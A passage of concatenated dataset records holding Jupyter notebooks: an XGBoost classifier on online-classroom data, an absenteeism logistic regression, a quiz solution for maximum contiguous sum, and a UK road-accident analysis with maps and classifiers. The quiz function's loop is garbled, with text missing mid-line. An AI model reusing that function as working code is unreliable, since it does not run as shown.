as plt\n\n# + [markdown] id=\"E5GItDlnkR-H\"\n# Data Loading\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 270} id=\"XpJZ3JtskRX_\" outputId=\"0d075c20-2160-4c2e-e4d9-d580202cbc58\"\ndf_data_1 = pd.read_csv('online_classroom_data.csv', index_col=0)\ndf_data_1.replace(',', '.', regex=True, inplace=True)\ndf_data_1.head()\n\n# + [markdown] id=\"Wv4cDFjylULe\"\n# Feature Scaling and target\n\n# + id=\"Z-4AKWG1lQ22\"\nfrom sklearn import preprocessing\n\ny = df_data_1['Approved'].values\n\nX = df_data_1[['total_posts', 'helpful_post', 'nice_code_post', 'collaborative_post', 'confused_post','creative_post','bad_post','amazing_post','timeonline']].values\nX = preprocessing.StandardScaler().fit(X).transform(X)\n\n# + [markdown] id=\"VL0ABRpclomO\"\n# Simple Train/test split\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"coZKvEwAlboO\" outputId=\"a7789779-6c54-4b0b-b8b6-3c233b399d9c\"\nfrom sklearn.model_selection import train_test_split\n\nfrom sklearn.metrics import f1_score\nfrom sklearn.metrics import log_loss\n\nX_train, X_test, y_train, y_test = train_test_split( X, y, test_size=0.2, random_state=4)\n\nprint ('Train set:', X_train.shape, y_train.shape)\nprint ('Test set:', X_test.shape, y_test.shape)\n\n\n# + [markdown] id=\"XiytAPnDmCmv\"\n# Model Fitting\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"1eR_X0IOl7MW\" outputId=\"5e69641a-abc5-4701-dac0-3c3b2035d10f\"\nimport xgboost as xgb\n\nxgb_model = xgb.XGBRegressor(random_state=42)\n\nxgb_model.fit(X_train, y_train)\nxgboost_yhat = xgb_model.predict(X_test)\n\n# + [markdown] id=\"66Q7Ru0ImvC-\"\n# Model Metrics\n#\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"zd2rh5pcmw5O\" outputId=\"5ec97551-5f4e-45f6-e491-921485794cac\"\nfrom sklearn.metrics import classification_report, confusion_matrix, accuracy_score\n\nprint(confusion_matrix(y_test,xgboost_yhat.round()))\nprint(classification_report(y_test,xgboost_yhat.round()))\nprint(accuracy_score(y_test, xgboost_yhat.round()))\n","repo_name":"DebopriyoMukhopadhyay/readytolearn","sub_path":"ReadyToLearn.ipynb","file_name":"ReadyToLearn.ipynb","file_ext":"py","file_size_in_byte":6110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"32"} +{"seq_id":"8312582205","text":"# ### Creating a logistic regression to predict absenteeism\n\n# #### Import the relevant libraries\n\nimport pandas as pd\nimport numpy as np\n\n# #### Load the data\n\ndata_preprocessed = pd.read_csv('C:/Users/Samuel Mwaniki/Downloads/Compressed/Data Scie/part_8_case_study/S53_L379/df-preprocessed.csv')\n\ndata_preprocessed.head()\n\n# #### Create the targets\n#\n# np.where(condition,value if True, value if False)\n# -.checks if a condition has been satisfied and assigns a value accordingly\n\n# the median value of absenteeism time in hours to use it as a cut-off line\ndata_preprocessed['Absenteeism Time in Hours'].median()\n\ntargets = np.where(data_preprocessed['Absenteeism Time in Hours'] > \n data_preprocessed['Absenteeism Time in Hours'].median(), 1,0)\n\ntargets\n\ndata_preprocessed['Excessive Absenteeism'] = targets\n\ndata_preprocessed.head()\n\n# #### A comment on the targets\n\n#the dataset should be balanced for the two outputs: it will prevent the model from learning to output only 0s or only 1s\n# we check by dividing the no_ of targets equal to 1 with the sum of all targets\ntargets.sum() / targets.shape[0]\n\n# dropping the absenteeism time in hours column\ndata_with_targets = 
data_preprocessed.drop(['Absenteeism Time in Hours','Day of the Week','Daily Work Load Average','Distance to Work'],axis=1)\n\n#checking if the data_with_targets is the same as data_preprocessed (False/True?)\ndata_with_targets is data_preprocessed\n\ndata_with_targets.head()\n\n# #### Select the inputs for regression\n\ndata_with_targets.shape\n\n#to select just the first 14 columns\ndata_with_targets.iloc[:,:14]\n\n# select all columns until -1 (same as above) (by putting a - it shows how many columns we want to skip from the end)\ndata_with_targets.iloc[:,:-1]\n\nunscaled_inputs = data_with_targets.iloc[:,:-1]\n\n# #### Standardize the data\n\n# +\n#from sklearn.preprocessing import StandardScaler\n\n#absenteeism_scaler = StandardScaler()\n\n# +\nfrom sklearn.base import BaseEstimator, TransformerMixin\nfrom sklearn.preprocessing import StandardScaler\n\n# create the Custom Scaler class\n\nclass CustomScaler(BaseEstimator,TransformerMixin): \n \n # init or what information we need to declare a CustomScaler object\n # and what is calculated/declared as we do\n \n def __init__(self,columns,copy=True,with_mean=True,with_std=True):\n \n # scaler is nothing but a Standard Scaler object\n self.scaler = StandardScaler(copy,with_mean,with_std)\n # with some columns 'twist'\n self.columns = columns\n self.mean_ = None\n self.var_ = None\n \n \n # the fit method, which, again based on StandardScale\n \n def fit(self, X, y=None):\n self.scaler.fit(X[self.columns], y)\n self.mean_ = np.mean(X[self.columns])\n self.var_ = np.var(X[self.columns])\n return self\n \n # the transform method which does the actual scaling\n\n def transform(self, X, y=None, copy=None):\n \n # record the initial order of the columns\n init_col_order = X.columns\n \n # scale all features that you chose when creating the instance of the class\n X_scaled = pd.DataFrame(self.scaler.transform(X[self.columns]), columns=self.columns)\n \n # declare a variable containing all information that was not scaled\n X_not_scaled = X.loc[:,~X.columns.isin(self.columns)]\n \n # return a data frame which contains all scaled features and all 'not scaled' features\n # use the original order (that you recorded in the beginning)\n return pd.concat([X_not_scaled, X_scaled], axis=1)[init_col_order] \n# -\n\nunscaled_inputs.columns.values\n\ncolumns_to_scale = ['Month Value', 'Transportation Expense', 'Age', 'Body Mass Index', 'Education',\n 'Children', 'Pets']\n\n\nabsenteeism_scaler = CustomScaler(columns_to_scale)\n\n#this will calculate and store the mean and the standard deviation\n#whenever you get new data you will know that the standardization information is contained in absenteeism_scaler\nabsenteeism_scaler.fit(unscaled_inputs)\n\n\n# .transform() does the actual scaling\nscaled_inputs = absenteeism_scaler.transform(unscaled_inputs)\n\nscaled_inputs\n\nscaled_inputs.shape\n\n# ### Split the data into Train and Test and Shuffle\n\n# #### Import the relevant module\n\n# this module splits arrays or matrices into train and test subsets\nfrom sklearn.model_selection import train_test_split\n\n# #### Split\n\n# +\n#sklearn.mode_selection.train_test_split(inputs,targets)\ntrain_test_split(scaled_inputs, targets)\n\n#array 1: a training dataset with inputs\n#array 2: a training dataset with targets\n#array 3: a trest dataset with inputs\n#array 4: a test dataset with targets\n# -\n\n##sklearn.mode_selection.train_test_split(inputs,targets, train_size, shuffle=True, random_state\nx_train, x_test, y_train, y_test = train_test_split(scaled_inputs, 
targets, train_size = 0.8, random_state=20)\n\nprint (x_train.shape, y_train.shape)\n\nprint (x_test.shape, y_test.shape)\n\n# ### Logistic regression with sklearn\n\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn import metrics\n\n# #### Train the model\n\nreg = LogisticRegression()\n\n#sklearn.linear_model.LogisticRegression.fit(x,y) fits the model according to the given training data\nreg.fit(x_train,y_train)\n\n#to evaluate the model's accuracy\n#sklearn.linear_model.LogisticRegression.score(inputs,targets) returns the mean accuracy on the given test data and labels\nreg.score(x_train,y_train)\n\n# #### Manually check the accuracy\n#\n# sklearn.linear_model.LogisticRegression.predict(inputs)\n# -> predicts class labels(logistic regression outputs) for given input samples\n\n#finding the predicted outputs of the regression\nmodel_outputs = reg.predict(x_train)\nmodel_outputs\n\ny_train\n\nmodel_outputs == y_train\n\n#total number of correct predictions(True entries)\nnp.sum((model_outputs==y_train))\n\n# to get accuracy (Accuracy = Correct predictions /#observations)\nnp.sum((model_outputs==y_train)) / model_outputs.shape[0]\n\n# #### Finding the intercept and coefficients\n#\n\n# + active=\"\"\n# log(odds) = Bo + B1x1 + B2x2 + ... + BkXk\n# | |\n# Intercept Coefficient\n# (bias) (weights)\n# -\n\nreg.intercept_\n\nreg.coef_\n\nunscaled_inputs.columns.values\n\nfeature_name = unscaled_inputs.columns.values\n\n# +\nsummary_table = pd.DataFrame (columns=['Feature name'],data = feature_name)\n\nsummary_table['Coefficient'] = np.transpose(reg.coef_)\n\nsummary_table\n# -\n\n#adding the intercept\nsummary_table.index = summary_table.index + 1\n# # +1 will shift all indices by 1\nsummary_table.loc[0] = ['Intercept', reg.intercept_[0]]\nsummary_table = summary_table.sort_index()\nsummary_table\n\n# #### Interpreting the coefficients\n\n#adding exponentials of the coefficients to our table\nsummary_table['Odds_ratio'] = np.exp(summary_table.Coefficient)\n\nsummary_table\n\n#DataFrame.sort_values(Series) sorts the values in a data frame with respect to a given column(Series)\nsummary_table.sort_values('Odds_ratio', ascending=False)\n\n# #### Testing the model\n\n#test accuracy is normally lower than the train accuracy (due to overfitting)\nreg.score(x_test,y_test)\n\n# +\n#to get the output\n#model_outputs = reg.predict(x_test)\n#model_outputs\n#or\n\n# use sklearn.linear_model.LogisticRegression.predict_proba(x) -(it returns the probability estimates for all possible outputs(classes))\n\npredicted_proba = reg.predict_proba(x_test)\npredicted_proba\n# -\n\npredicted_proba.shape\n\npredicted_proba[:,1]\n\n# ### Save the model\n# ###### pickle [module]\n# is a python module used to convert a python object into a character stream\n\nimport pickle \n\n#model-file name wb- write bytes dump -'save' reg - object to be dumped\nwith open('model', 'wb') as file:\n pickle.dump(reg, file)\n\nwith open('scaler', 'wb') as file:\n pickle.dump(absenteeism_scaler, file)\n\n \n","repo_name":"bennlab/Absenteeism-Prediction-Model","sub_path":"Absenteeism Model - Logistic Regression .ipynb","file_name":"Absenteeism Model - Logistic Regression .ipynb","file_ext":"py","file_size_in_byte":7824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"32"} +{"seq_id":"11169894732","text":"def max_contig_sum(L):\n \"\"\" L, a list of integers, at least one positive\n Returns the maximum sum of a contiguous subsequence in L \"\"\"\n #YOUR CODE HERE\n max_num 
= 0\n flag = 0\n for i in range(0,len(L)):\n flag = L[i]\n if flag > max_num:\n max_num = flag\n \n j = i+1\n while(j max_num:\n max_num = flag\n j += 1\n return max_num\n \n\n\nmax_contig_sum([3, 4, -1, 5, -4])\n\nmax_contig_sum([3, 4, -8, 15, -1, 2])\n\n\n","repo_name":"Synrhr/Algorithm-Review","sub_path":"MIT 6.00.2x maximum sum of a contiguous subsequence (QUIZ 4).ipynb","file_name":"MIT 6.00.2x maximum sum of a contiguous subsequence (QUIZ 4).ipynb","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"32"} +{"seq_id":"73989988891","text":"# + _cell_guid=\"b1076dfc-b9ad-4769-8c92-a6c4dae69d19\" _uuid=\"8f2839f25d086af736a60e9eeb907d3b93b6e0e5\"\n# This Python 3 environment comes with many helpful analytics libraries installed\n# It is defined by the kaggle/python docker image: https://github.com/kaggle/docker-python\n# For example, here's several helpful packages to load in \n\nimport numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\nimport matplotlib.pyplot as plt\n\n# Input data files are available in the \"../input/\" directory.\n# For example, running this (by clicking run or pressing Shift+Enter) will list the files in the input directory\n\nimport os\nprint(os.listdir(\"../input\"))\n\n# Any results you write to the current directory are saved as output.\n\n# + _cell_guid=\"79c7e3d0-c299-4dcb-8224-4455121ee9b0\" _uuid=\"d629ff2d2480ee46fbb7e2d37f6b5fab8052498a\"\naccidents = pd.read_csv('../input/Accidents 2012-2016.csv')\n\n# + _uuid=\"0ad81fb9b7924a3bbfb3a28fd1869fe65e819440\"\nvehicles = pd.read_csv('../input/Vehicles in Accidents 2012-2016.csv')\n\n# + _uuid=\"b5595beb5429aae5f7fdfbb834143c3388caf9e3\"\nprint(accidents.shape)\nprint(vehicles.shape)\n\n\n# + _uuid=\"1df5183699ab21fa7372da0f46a32854e58df57d\"\naccidents.head(3)\n\n# + _uuid=\"a6174a1c8bcf08c4110433ba326f6ed7a73767e7\"\nvehicles.head(3)\n\n# + [markdown] _uuid=\"6c43002368c602bcee37c53b7d263b0a1539a931\"\n# Σαν ένα πρώτο βήμα θα διαγράψουμε κάποιες στήλες του συνόλου δεδομένων οι οποίες δε μας βοηθούν στην ανάλυση που θα πραγματοποιήσουμε παρακάτω.\n\n# + _uuid=\"e3b99be607f10e58512479572eaa5d118f7e0a25\"\naccidents.isna().sum()\n\n# + _uuid=\"10df8616bd2f2948662e03b8b660d65eb3aa23c8\"\naccidents = accidents.drop(['2nd_Road_Class',\\\n '2nd_Road_Number',\\\n 'Carriageway_Hazards',\\\n 'Did_Police_Officer_Attend_Scene_of_Accident',\\\n 'Local_Authority_(District)',\\\n 'Local_Authority_(Highway)',\\\n 'Location_Easting_OSGR',\\\n 'Location_Northing_OSGR',\\\n 'LSOA_of_Accident_Location',\\\n 'Pedestrian_Crossing-Human_Control',\\\n 'Pedestrian_Crossing-Physical_Facilities',\\\n 'Police_Force',\\\n 'InScotland',\\\n 'Special_Conditions_at_Site',\\\n ]\n ,axis =1 )\n\n# + _uuid=\"d060b6979f5636b8aa7d712d811f4230d4901ba8\"\n# Remove rows with NAs\nprint(accidents.shape)\naccidents = accidents.dropna()\nprint(accidents.shape)\n\n# + _uuid=\"f73ea84a4cd1401d2524088d77aa627cff37dbad\"\n# accidents.isna().sum()\n\n# + [markdown] _uuid=\"4bf95a9a1e65dfe2dce36b554dbf1110771767ce\"\n# Στη συνέχεια θα κάνουμε κάποιες μετατροπές στους τύπους δεδομένων ορισμένων στήλων. 
Για παράδειγμα πολλές μεταβλητές λαμβάνουν συγκεκριμένες τιμές οπότε θα τις μετατρέψουμε σε κατηγορικές.\n\n# + _uuid=\"d2bae7963f89bb443645e8c36fcd98ee0f1e2e32\"\n#Data type conversion\naccidents = accidents.astype({'Accident_Index': 'str', \\\n '1st_Road_Class':'category'\n ''\n })\nprint(accidents.dtypes)\n\n# + _uuid=\"33182b643d644d234c7fc68918db05b1d4eac75d\"\nlevel3 = accidents[accidents['Accident_Severity'] == 'Slight']\nlevel2 = accidents[accidents['Accident_Severity'] == 'Serious']\nlevel1 = accidents[accidents['Accident_Severity'] == 'Fatal']\n\nf, (ax1,ax2,ax3) = plt.subplots(1,3,figsize=(15,9))\n\n## Slight plot\nlevel3.plot(kind='scatter', x='Longitude',y ='Latitude',\n color='yellow', \n s=.02, alpha=.6, subplots=True, ax=ax1)\nax1.set_title(\"Slight\")\nax1.set_facecolor('black')\n\n## Serious plot\nlevel2.plot(kind='scatter', x='Longitude',y ='Latitude',\n color='yellow', \n s=.02, alpha=.6, subplots=True, ax=ax2)\nax2.set_title(\"Serious\")\nax2.set_facecolor('black')\n\n# Fatal plot\n\nlevel1.plot(kind='scatter', x='Longitude',y ='Latitude',\n color='yellow', \n s=.02, alpha=.6, subplots=True, ax=ax3)\nax3.set_title(\"Fatal\")\nax3.set_facecolor('black')\n\n\n\n\nf.show()\n\n# + _uuid=\"338de9df3d23ce03451e6d68e79e2a274f311517\"\nag = accidents.groupby('Accident_Severity').Road_Type.value_counts().sort_index()\n\n# + _uuid=\"e09d8494c19898c3cb304bea6308dd42322f8529\"\nag.unstack()\n\n# + _uuid=\"e7dcc1058004e5644c12ae647f278a39979737af\"\nag.unstack().plot(kind='bar', subplots=True, layout=(3,2),figsize= (10,10))\nplt.show()\n\n# + _uuid=\"2dd9a06c9cc4f58ff3759f59094bebc0004bd100\"\n# ag1 =accidents.groupby('Accident_Severity').Accident_Severity.value_counts().sort_index()\n# ag.unstack().plot(kind='pie', subplots=True,layout = (2,2) ,figsize= (13,13))\n# plt.show()\n\na =plt.pie(accidents.Accident_Severity.value_counts(), )\nplt.show()\n\n# + _uuid=\"717580479fc70731c84881191fe5432e353c4e46\"\nag = accidents.Accident_Severity.value_counts().sort_index()\n\nplt.figure(figsize=(7,7))\nag.plot(kind='pie', subplots=True,figsize= (13,13))\nplt.title('Accident Severity' , fontsize= 20)\nplt.grid(False)\n# plt.ylabel('Accident count' , fontsize = 20)\n# plt.xlabel('0 - Sunday , 1 - Monday ,2 - Tuesday , 3 - Wednesday , 4 - Thursday , 5 - Friday , 6 - Saturday' , fontsize = 13)\n\n\n# + _uuid=\"f7094e5ad6c52d7ce0cf4f5d50967ba9db13fc2c\"\nag = accidents.groupby('Accident_Severity').Day_of_Week.value_counts().sort_index()\n# ag.unstack()\nag.unstack().plot(kind='pie', subplots=True, layout=(3,3),figsize= (13,13))\nplt.show()\n\n# + _uuid=\"ac09ab3b834524eb0e0e8b38b828b8c92c78db73\"\nag = accidents.Day_of_Week.value_counts().sort_index()\nag.plot(kind='pie',figsize= (7,7))\n\n# + _uuid=\"c15e1f53c190c6c7319fdf950048b02c94eeaf25\"\nag = accidents.groupby('Accident_Severity').Urban_or_Rural_Area.value_counts().sort_index()\nag.unstack()\nag.unstack().plot(kind='pie', subplots=True, layout=(3,3),figsize= (13,13))\nplt.show()\n\n# + _uuid=\"b00bfcafcc05d9ef190690fee767202a24a37cb7\"\nyear_wise_casualties = accidents.groupby(['Year'])['Number_of_Casualties'].sum()\nyear_wise_casualties = year_wise_casualties.reset_index()\nyear_wise_casualties\n\n# + _uuid=\"65867a71bb9944def6e11893b762400f69c7cabf\"\n# names = ['0 - 5','6 - 10','11 - 15','16 - 20','21 - 25','26 - 35','36 - 45','46 - 55','56 - 65','66 - 75','Over 75','Data missing or out of range']\nag = vehicles.groupby('Age_Band_of_Driver').Sex_of_Driver.value_counts().sort_index()\nag.unstack().plot(kind='bar', stacked =True, 
layout=(4,4),figsize= (16,16))\nplt.show()\n\n# + _uuid=\"342e89ec9e618a93861a95719c33451c9037ec83\"\nag = vehicles.groupby('Age_Band_of_Driver').Sex_of_Driver.value_counts().sort_index()\nag.unstack()\n\n# + _uuid=\"14fe9e582ce3213b3e78b6b6291d56eeeb8b71f2\"\nimport warnings\nwarnings.filterwarnings('ignore')\n# graphing and visualization\n\nimport folium\nimport folium.plugins as plugins\n# from mpl_toolkits.basemap import Basemap\n\n# import heapq \n\n# + _uuid=\"9a0d434331af7d82b24c5cc49c310306566d0de0\"\n# accidents.head(3)\n\n# + _uuid=\"47da787ec44b7ec5c37246ebb37394e1b0d08005\"\ndata=[]\ntempdf = accidents.sample(30000)\ntempdf[\"Time\"]= tempdf[\"Time\"].astype(str)\ntempdf['Time']= tempdf['Time'].str.slice(0,2, 1)\ntempdf[\"Time\"]= tempdf[\"Time\"].astype(int)\n\ncsts=list(tempdf['Time'].unique())\nfor row in csts:\n subset=tempdf[tempdf['Time']==row]\n data.append(subset[['Latitude','Longitude']].values.tolist())\n\n# for i in range(10):\n# temp = accidents[i]\n# data.append(temp[['Latitude','Longitude']].values.tolist())\n \n# lat = 52.476672\n# lon = -1.856415\nlat = 53.976672\nlon = -1.856415\n\nzoom_start = 6\nprint(\"Accidents during the Time of Day\")\nindx=[]\nfor i in range(1,24):\n indx.append(str(i)+':00')\nindx.append('00:00')\n# lat and lon varaibles , is where the animation begins.\nm = folium.Map(location=[lat, lon], tiles=\"Cartodb dark_matter\", zoom_start=zoom_start)\n#inprovising the Heatmapwith time plugin to show variations across star ratings \n# hm = plugins.HeatMapWithTime(data,max_opacity=0.3,auto_play=True,display_index=True,radius=10,max_speed=0.1)\nhm = plugins.HeatMapWithTime(data,radius=5,index=indx, scale_radius = False,\\\n max_opacity=0.7,auto_play=True,display_index=True,index_steps = 1,max_speed=0.1)\nhm.add_to(m)\nm\n\n# + _uuid=\"ff7f50617d924b38ab7115b45f4948b8b6d844ab\"\naccidents.shape\n\n\n# + _uuid=\"b09db80da438c1d52ef9689d9b86aafb46241ab4\"\n\n\n# + _uuid=\"400d1424e067285e3eeab385eefe9f7cdca85b9c\"\nimport seaborn as sn\n\n# + _uuid=\"effbcf37f30aea886a496d424bf593b6de713278\"\nveh_temp = pd.DataFrame()\nveh_temp[\"Age_Band_of_Driver\"] = vehicles[\"Age_Band_of_Driver\"]\nveh_temp[\"Age_of_Vehicle\"] = vehicles['Age_of_Vehicle']\nveh_temp[\"Sex_of_Driver\"] = vehicles[\"Sex_of_Driver\"]\nveh_temp[\"Vehicle_Type\"] = vehicles[\"Vehicle_Type\"]\n\nveh_temp['Age_Band_of_Driver'] = pd.Categorical(veh_temp['Age_Band_of_Driver'], categories=['0 - 5','6 - 10','11 - 15','16 - 20','21 - 25','26 - 35', '36 - 45','46 - 55','56 - 65','66 - 75','Over 75','Data missing or out of range'], ordered=True)\n\nMale = veh_temp[veh_temp['Sex_of_Driver'] == 'Male'][\"Age_Band_of_Driver\"].value_counts().sort_index()\nFemale = veh_temp[veh_temp['Sex_of_Driver'] == 'Female'][\"Age_Band_of_Driver\"].value_counts().sort_index()\n\nfig, ax = plt.subplots(figsize=(12,7))\nind = np.arange(len(Male)-1)\nwidth = 0.4 \np1 = ax.bar(ind, Male[0:11].values, width, color='b')\np2 = ax.bar(ind + width, Female[0:11].values, width,color='r')\n\nplt.title(\"Drivers Age Bands\")\nax.set_xticks(ind + width / 2)\nax.set_xticklabels(Male[0:11].index)\nplt.ylabel(\"Count\")\nplt.xlabel(\"Age Band\")\nplt.legend(['Male', 'Female'], loc='upper right')\nplt.show()\n\nType = veh_temp[\"Vehicle_Type\"].value_counts().sort_index()\nlabels = list(Type.index)\ndata = list(Type.values)\n\nplt.figure(1, figsize=(8,5))\nwedges, texts = plt.pie(data,startangle=90)\nplt.title(\"Pie Chart of Vehicle Types\")\nplt.legend(wedges, labels,\n title=\"Vehicle Types\",\n loc=\"best\",\n 
bbox_to_anchor=(1, 0, 0.5, 1))\nplt.show()\n\n\nAges = pd.DataFrame(veh_temp['Age_of_Vehicle'])\nAges = Ages.dropna()\nplt.figure(1, figsize=(15,8))\nsn.distplot(Ages)\n\n\nveh_temp['Age_Band_of_Driver'] = pd.Categorical(veh_temp['Age_Band_of_Driver'], categories=['0 - 5','6 - 10','11 - 15','16 - 20','21 - 25','26 - 35', '36 - 45','46 - 55','56 - 65','66 - 75','Over 75','Data missing or out of range'], ordered=True)\n\n\nMale = veh_temp[veh_temp['Sex_of_Driver'] == 'Male'][\"Age_Band_of_Driver\"].value_counts().sort_index()\nFemale = veh_temp[veh_temp['Sex_of_Driver'] == 'Female'][\"Age_Band_of_Driver\"].value_counts().sort_index()\n\nfig, ax = plt.subplots(figsize=(10,5))\n\nplt.bar(Male[0:11].index, Male[0:11].values, alpha=0.75)\nplt.bar(Female[0:11].index, Female[0:11].values, alpha=0.75)\nplt.title(\"Drivers Age Bands\")\nplt.ylabel(\"Count\")\nplt.xlabel(\"Age Band\")\nplt.legend(['Male', 'Female'], loc='upper right')\nplt.show()\n\n# + _uuid=\"080be83f38ef6cc25adefcf3abe10c9e93da962d\"\n# import cityphi.application\n\n# + _uuid=\"528c140b60d030d64fb93032ecfdc0574e221c9e\"\n\n\n# + _uuid=\"6f9bc6715e30e991b3e481653e73cf622389c9e3\"\n\n\n# + _uuid=\"16f52c95a31e816d8a414c41f8b596b33d1b619f\"\n\n\n# + _uuid=\"52adfc4b266e4975cb486ff28d04644157d49945\"\n\n\n# + _uuid=\"a7fa89ebe6ac365370ac85fb828696ec8f0c4bca\"\n\n\n# + _uuid=\"599d2285a7346fce63f008ccb2281b8132adc4fc\"\n\n\n# + _uuid=\"af0b0c0f4e90a283a280ec5be15c5774b3d999da\"\naccidents_ML = accidents.drop(['Accident_Index',\\\n 'Number_of_Casualties',\\\n 'Light_Conditions',\\\n '1st_Road_Number',\\\n 'Date',\\\n 'Latitude',\\\n 'Junction_Control',\\\n 'Junction_Detail',\\\n 'Longitude',\\\n 'Year'],axis =1)\n\n# + _uuid=\"12c461fca82e6bef75a3c4de9628bec88294ddb0\"\naccidents_categorical = accidents_ML.drop(['Number_of_Vehicles',\\\n 'Speed_limit',\\\n 'Time'],axis =1)\n\nfrom scipy.stats import chi2_contingency\navailable_features = [feature for feature in accidents_categorical.columns]\n\nchi2_matrix = []\nindex = []\n\nfor feature_a in available_features:\n index.append(feature_a)\n row = []\n for feature_b in available_features:\n contingency = pd.crosstab(accidents_categorical[feature_a],\n accidents_categorical[feature_b])\n #acceptance level is 0.05\n p = chi2_contingency(contingency)[1]\n row.append(p)\n chi2_matrix.append(row)\n \nchi2_p_values = pd.DataFrame(chi2_matrix, columns=index, index=index)\nchi2_p_values\n\n# + _uuid=\"00f86e814920032d13f2eaca59d16af9a40b3b48\"\n\n\n# + _uuid=\"8cd78ee729e1d5a71088e6abfcaddf2dbcfa7673\"\naccidents_ML.shape\n\n# + _uuid=\"a7632d4c201109b79465cd7bef0ef0fb2c419724\"\naccidents_ML.head(3)\n\n# + _uuid=\"1e6c29d4ddb751d6330e75594bba3707e6656404\"\n# labels = accidents_ML.Accident_Severity.tolist()\n# labels[0:5]\n\n# + _uuid=\"2dd075d044cdac221114ce015af246851a9759c8\"\ncol = ['1st_Road_Class','Day_of_Week','Road_Surface_Conditions','Road_Type','Urban_or_Rural_Area','Weather_Conditions']\nX = pd.get_dummies(accidents_ML, columns=col)\n# X = X.drop(['Accident_Severity'],axis=1)\nX.head(5)\n\n# + _uuid=\"5aabd2688a1e164be64869781ae848e04b4c7f92\"\nX[\"Time\"]= X[\"Time\"].astype(str)\nX['Time']= X['Time'].str.slice(0,2, 1)\nX[\"Time\"]= X[\"Time\"].astype(int)\n\n# + _uuid=\"43e4f55a3c70718915163f7306318bbdd68e4d03\"\nX.head(5)\nX.shape\n\n# + _uuid=\"36ff9c6aecce45d4f6213dc6e6bf3fbaba127e24\"\nX[\"Speed_limit\"]= X[\"Speed_limit\"].astype(int)\nX.head(5)\n\n\n# + _uuid=\"eb262c59d98f6f178fad69f3f8dbc31903d86e00\"\nX2 = pd.DataFrame(X)\n\n# + 
_uuid=\"004dea6bd0168d63e4bf68c9ebc896d7702bca30\"\n# Class count\ncount_slight, count_serious, count_fatal = X.Accident_Severity.value_counts()\n\nprint(count_slight,count_serious, count_fatal)\n\n# Divide by class\ndf_slight = X[X['Accident_Severity'] == 'Slight']\ndf_serious = X[X['Accident_Severity'] == 'Serious']\ndf_fatal = X[X['Accident_Severity'] == 'Fatal']\n\n# + _uuid=\"2048e33a7d028f63a2925c8d7b1625f7d1168fe2\"\ndf_slight_under = df_slight.sample(count_fatal)\ndf_serious_under = df_serious.sample(count_fatal)\n\ntrain_under = pd.concat([df_slight_under, df_serious_under, df_fatal], axis=0)\n\nprint('Random under-sampling:')\nprint(train_under.Accident_Severity.value_counts())\n\ntrain_under.Accident_Severity.value_counts().plot(kind='bar', title='Count (Accident Severity)');\n\n# + _uuid=\"cdfa9d26d1615c07b98bc5f380dc36a40a7fa760\"\nX = train_under\n\n# + _uuid=\"748e17baca07497dd714b4c77e63eafb1788e898\"\n# Split the training dataset in 80% / 20%\nfrom sklearn.model_selection import train_test_split\ntrain_set, test_set = train_test_split(X, test_size=0.1, random_state=42)\n\n# + _uuid=\"bc8f8debe4ff5f2690967fc3e50bee42168e6c02\"\n# Separate labels from the rest of the dataset\ntrain_set_labels = train_set[\"Accident_Severity\"].copy()\ntrain_set = train_set.drop(\"Accident_Severity\", axis=1)\n\ntest_set_labels = test_set[\"Accident_Severity\"].copy()\ntest_set = test_set.drop(\"Accident_Severity\", axis=1)\n\n# + _uuid=\"6ec173663c7807b09eabf7c33cccdd61803b23bd\"\n# Apply a scaler\nfrom sklearn.preprocessing import MinMaxScaler as Scaler\n\nscaler = Scaler()\n\nscaler.fit(train_set)\n\ntrain_set_scaled = scaler.transform(train_set)\ntest_set_scaled = scaler.transform(test_set)\n\n# + _uuid=\"d715d535d11b4d6b4ec2a2b3af998c002081ae1c\"\ndf = pd.DataFrame(data=train_set_scaled)\ndf.shape\n\n# + _uuid=\"d30b922ae1d26ef8aef01167d66300a80abb0299\"\n# train_set_labels\n\n# + _uuid=\"28cb42c78660443bb81ab8dee4566b4d2b85ece9\"\nfrom sklearn.preprocessing import LabelEncoder\n\nle = LabelEncoder()\ny_train = le.fit_transform(train_set_labels)\ny_train\n\n# + _uuid=\"da25522fc95280250ef7ee0c0f1da88800897d30\"\n# Import all the algorithms we want to test\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.tree import DecisionTreeClassifier\n\n# + _uuid=\"50e2821cd3c4a899ecf4b34370bb742937e9bb2b\"\n# Import the slearn utility to compare algorithms\nfrom sklearn import model_selection\n\n# Prepare an array with all the algorithms\nmodels = []\nmodels.append(('LR', LogisticRegression()))\nmodels.append(('RFC', RandomForestClassifier())) \nmodels.append(('DTC', DecisionTreeClassifier())) \n\n# + _uuid=\"6abee97c3725a1617911b581aae94e62ff3481f6\"\n# Prepare the configuration to run the test\nseed = 7\nresults = []\nnames = []\nX_train = train_set_scaled\n\n# + _uuid=\"e326d822e92ae9a9d4cc7c8ee3a64753bdc98a5b\"\n# Every algorithm is tested and results are\n# collected and printed\nfrom sklearn.metrics import cohen_kappa_score, make_scorer\nkappa_scorer = make_scorer(cohen_kappa_score)\n\nfor name, model in models:\n kfold = model_selection.KFold(n_splits=10, random_state=seed)\n# cv_results = model_selection.cross_val_score(model, X_train, y_train, cv=kfold, scoring=kappa_scorer,n_jobs = -1)\n cv_results = model_selection.cross_val_score(model, X_train, y_train, cv=kfold, scoring='balanced_accuracy',n_jobs = -1)\n results.append(cv_results)\n names.append(name)\n msg = \"%s: %f (%f)\" % (name, cv_results.mean(), 
